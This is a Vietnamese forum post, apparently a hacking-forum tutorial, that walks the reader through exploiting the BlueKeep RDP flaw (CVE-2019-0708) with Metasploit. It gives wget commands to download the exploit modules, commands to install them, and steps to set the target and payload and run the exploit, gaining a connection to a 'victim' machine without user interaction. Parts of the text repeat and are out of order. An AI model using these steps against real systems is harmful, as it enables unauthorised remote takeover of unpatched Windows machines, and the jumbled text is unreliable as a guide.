DDos
VIP Members
-
22/10/2013
-
524
-
2.191 bài viết
Khai thác lỗ hổng thực thi mã từ xa trong Remote Desktop Protocol với Metasploit
Trong bản vá tháng 5 vừa qua, Microsoft đã vá một lỗ hổng thực thi mã từ xa rất nguy hiểm liên quan đến giao thức Remote Desktop Protocol (RDP). Điều nguy hiểm nhất của lỗ hổng này nằm ở việc không yêu cầu xác thực cũng như tương tác của người dùng. Lỗ hổng này ảnh hưởng tới Windows 2003, XP, Windows 7, Windows Server 2008 và 2008 R2 và có thể tự động lây lan trên các hệ thống không được bảo vệ. Mặc dù, Windows XP đã ngưng hỗ trợ, nhưng do mức độ ảnh hưởng quá lớn tới hệ thống, Microsoft đã phải tung ra bản vá khẩn cấp cho phiên bản Windows cũ kỹ này.
Gần đây, dưới sự hợp tác của nhiều nhà nghiên cứu bảo mật, họ đã công bố module khai thác cho phép thực thi mã từ xa thông qua lỗ hổng BlueKeep. Module này được tích hợp sẵn vào nền tảng thử nghiệm thâm nhập nổi tiếng Metasploit. Module này cho phép khai thác dễ dàng lỗ hổng BlueKeep.
Trong bài viết này mình sẽ hướng dẫn các bạn cách khai thác lỗ hổng BlueKeep sử dụng Metasploit.
Yêu cầu:
Bước 2: Do các module chưa được chính thức tích hợp vào Metasploit nên bạn cần tải về các module cần thiết phục vụ cho việc khai thác lỗ khổng. Sử dụng các lệnh dưới đây để tải các module này:
Bước 3: Di chuyển các module vừa tải về ở trên tới Metasploit với các lệnh dưới:
Bước 4: Chạy Metasploit với lệnh msfconsole và tải lại toàn bộ module của Metasploit:
Bước 5: sử dụng module cve_2019_0708_bluekeep_rce và thiết lập các tham số RHOSTS/TARGET/PAYLOAD cần thiết
Bước 6: Chạy lệnh exploit để tiến hành khai thác mục tiêu.
Chúng ta đã có một kết nối từ máy tính nạn nhân mà không cần bất kì một tương tác nào từ phía họ.
Lưu ý: Microsoft đã chính thức tung ra bản vá cho lỗ hổng này. Các bạn nên cập nhật hệ thống Windows của mình để đảm bảo hệ thống được an toàn trước sự nguy hiểm của lỗ hổng này.
Gần đây, dưới sự hợp tác của nhiều nhà nghiên cứu bảo mật, họ đã công bố module khai thác cho phép thực thi mã từ xa thông qua lỗ hổng BlueKeep. Module này được tích hợp sẵn vào nền tảng thử nghiệm thâm nhập nổi tiếng Metasploit. Module này cho phép khai thác dễ dàng lỗ hổng BlueKeep.
Trong bài viết này mình sẽ hướng dẫn các bạn cách khai thác lỗ hổng BlueKeep sử dụng Metasploit.
Yêu cầu:
- Kali Linux
- Windows 7/ Server 2008R2
Mã:
apt install Metasploit-framework
Mã:
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
Mã:
mv rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
mv rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
mv cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mv cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
Mã:
reload_all
Bước 6: Chạy lệnh exploit để tiến hành khai thác mục tiêu.
Chúng ta đã có một kết nối từ máy tính nạn nhân mà không cần bất kì một tương tác nào từ phía họ.
Lưu ý: Microsoft đã chính thức tung ra bản vá cho lỗ hổng này. Các bạn nên cập nhật hệ thống Windows của mình để đảm bảo hệ thống được an toàn trước sự nguy hiểm của lỗ hổng này.